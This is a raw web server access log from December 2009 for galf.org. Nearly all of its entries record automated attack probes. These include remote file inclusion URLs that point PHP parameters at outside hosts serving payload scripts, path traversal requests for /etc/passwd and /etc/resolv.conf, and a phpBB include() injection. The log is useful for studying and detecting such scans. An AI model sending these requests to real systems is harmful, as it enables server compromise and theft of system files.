174.37.63.226 - - [28/Dec/2009:06:47:05 -0800] "GET /logs/access_091130.log/!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:47:05 -0800] "GET /!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:47:05 -0800] "GET /logs/!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:47:23 -0800] "GET /admin/auth!php?xcart_dir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:06:47:42 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:06:47:42 -0800] "GET /logs/access_090817.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:06:47:42 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:47:58 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:47:58 -0800] "GET /components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:47:58 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:48:05 -0800] "GET /logs/access_091221.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:06:48:06 -0800] "GET /logs/access_090629.log%20%20/phphtml.php?htmlclass_path=http://phoviet.vn.net//backend/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:48:06 -0800] "GET /logs/access_091102.log/!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:06:48:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:48:16 -0800] "GET /components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:06:48:33 -0800] "GET /logs/access_090608.log/?pagina=http://www.ouestresidentiel.com/components/com_poll/models/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:06:48:33 -0800] "GET /?pagina=http://www.ouestresidentiel.com/components/com_poll/models/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:06:48:33 -0800] "GET /logs/?pagina=http://www.ouestresidentiel.com/components/com_poll/models/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:06:48:38 -0800] "GET /logs/access_090615.log/?pagina=http://www.ouestresidentiel.com/components/com_poll/models/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:49:12 -0800] "GET /logs/access_091116.log//components/com_joomlalib/standalone/stubjambo!php?baseDir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:06:49:24 -0800] "GET /logs/access_090629.log%20%20/?pagina=http://www.ouestresidentiel.com/components/com_poll/models/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.147.237 - - [28/Dec/2009:06:49:24 -0800] "GET /logs/access_090615.log%20%20/?pagina=http://www.ouestresidentiel.com/components/com_poll/models/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:49:42 -0800] "GET /logs/access_091214.log//admin/auth!php?xcart_dir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:49:42 -0800] "GET /admin/auth!php?xcart_dir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:49:42 -0800] "GET /logs//admin/auth!php?xcart_dir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:49:56 -0800] "GET /logs/access.log//admin/auth!php?xcart_dir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:50:00 -0800] "GET /logs/!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:50:01 -0800] "GET /!scanhttp://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:06:51:02 -0800] "GET /logs/access_090817.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [28/Dec/2009:06:51:03 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [28/Dec/2009:06:51:03 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.131.226.52 - - [28/Dec/2009:06:51:28 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:51:30 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser!php?myPath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:51:30 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser!php?myPath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:51:31 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser!php?myPath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:06:51:43 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:06:52:06 -0800] "GET /logs/access_091130.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:52:32 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:52:32 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:52:32 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:06:52:34 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:52:36 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:53:02 -0800] "GET /forum///viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc1/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:53:02 -0800] "GET /logs//forum///viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc1/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:53:02 -0800] "GET /logs/access_090706.log//forum///viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc1/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:53:05 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:53:05 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:53:05 -0800] "GET /logs/access_090817.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:53:09 -0800] "GET /logs/access_091221.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:54:35 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:06:54:36 -0800] "GET /logs/access_090921.log//include.php?path[docroot]=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:54:43 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser!php?myPath=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:54:44 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:54:45 -0800] "GET /logs/access_090817.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:54:45 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:54:45 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:54:59 -0800] "GET /logs/access_091221.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:55:12 -0800] "GET /logs/access_091026.log//forum///viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc1/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:55:14 -0800] "GET /logs/access_090817.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.61.206 - - [28/Dec/2009:06:55:15 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.daemyung-eng.co.kr//bbs/files/img00.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.37.199.41 - - [28/Dec/2009:06:55:23 -0800] "GET /logs/access_091221.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.26 - - [28/Dec/2009:06:55:36 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Comcast Install 1.0; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.6; InfoPath.2; Dealio Deskball 3.0)" "galf.org"
211.223.205.250 - - [28/Dec/2009:06:55:39 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:55:39 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:55:39 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:55:45 -0800] "GET /logs/access_090817.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:56:51 -0800] "GET /logs/access_091221.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:56:59 -0800] "GET /logs/access_090817.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:06:57:13 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:57:39 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.63.226 - - [28/Dec/2009:06:58:13 -0800] "GET /logs/access_091116.log//admin/auth!php?xcart_dir=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:58:24 -0800] "GET /logs/access_090817.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:06:58:24 -0800] "GET /logs/access_090706.log%20%20//forum///viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc1/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.223.205.250 - - [28/Dec/2009:06:58:25 -0800] "GET /logs/access_091221.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.dwno.or.kr//bbs/data/wiwon02/van1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:06:59:47 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
121.101.214.54 - - [28/Dec/2009:07:00:08 -0800] "GET /logs/access_091026.log%20%20//forum///viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc1/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.labottevini.com/pub/idfx1??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.17.147.44 - - [28/Dec/2009:07:01:30 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
201.17.147.44 - - [28/Dec/2009:07:01:32 -0800] "GET /main.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.55.207.118 - - [28/Dec/2009:07:02:13 -0800] "GET /labia/?D=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:07:02:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:07:02:33 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
69.175.29.2 - - [28/Dec/2009:07:02:34 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://cimpli.mwzaf.com/upload/files/19/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "galf.org"
75.151.248.42 - - [28/Dec/2009:07:05:01 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:07:06:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:07:08:58 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:07:09:22 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:11:54 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:11:54 -0800] "GET /logs/access_091123.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:11:54 -0800] "GET /logs/access_091123.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:11:54 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:11:55 -0800] "GET /logs/access_090720.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:11:55 -0800] "GET /logs/access_090720.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:11:55 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:11:55 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:07:12:01 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:12:45 -0800] "GET /logs/access_091026.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:12:45 -0800] "GET /logs/access_091026.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:13:10 -0800] "GET /logs/access_090713.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:13:10 -0800] "GET /logs/access_090713.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:13:16 -0800] "GET /logs/access_090817.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:13:16 -0800] "GET /logs/access_090817.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:07:13:31 -0800] "GET /logs/access_091221.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:13:32 -0800] "GET /logs/access_090706.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:13:33 -0800] "GET /logs/access_090706.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
82.195.252.206 - - [28/Dec/2009:07:13:54 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.195.252.206 - - [28/Dec/2009:07:13:54 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.195.252.206 - - [28/Dec/2009:07:13:54 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.76.107.242 - - [28/Dec/2009:07:14:15 -0800] "GET /logs/access_090615.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:14:15 -0800] "GET /logs/access_090615.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.0" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:14:17 -0800] "GET /logs/access_090824.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:14:18 -0800] "GET /logs/access_090824.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:14:39 -0800] "GET /logs/access_090622.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [28/Dec/2009:07:14:39 -0800] "GET /logs/access_090622.log/components/com_performs/performs.php?mosConfig_absolute_path=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
75.151.248.42 - - [28/Dec/2009:07:14:50 -0800] "GET /administrator/components/com_x-shop/admin.x-shop.php?mosConfig.absolute.path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
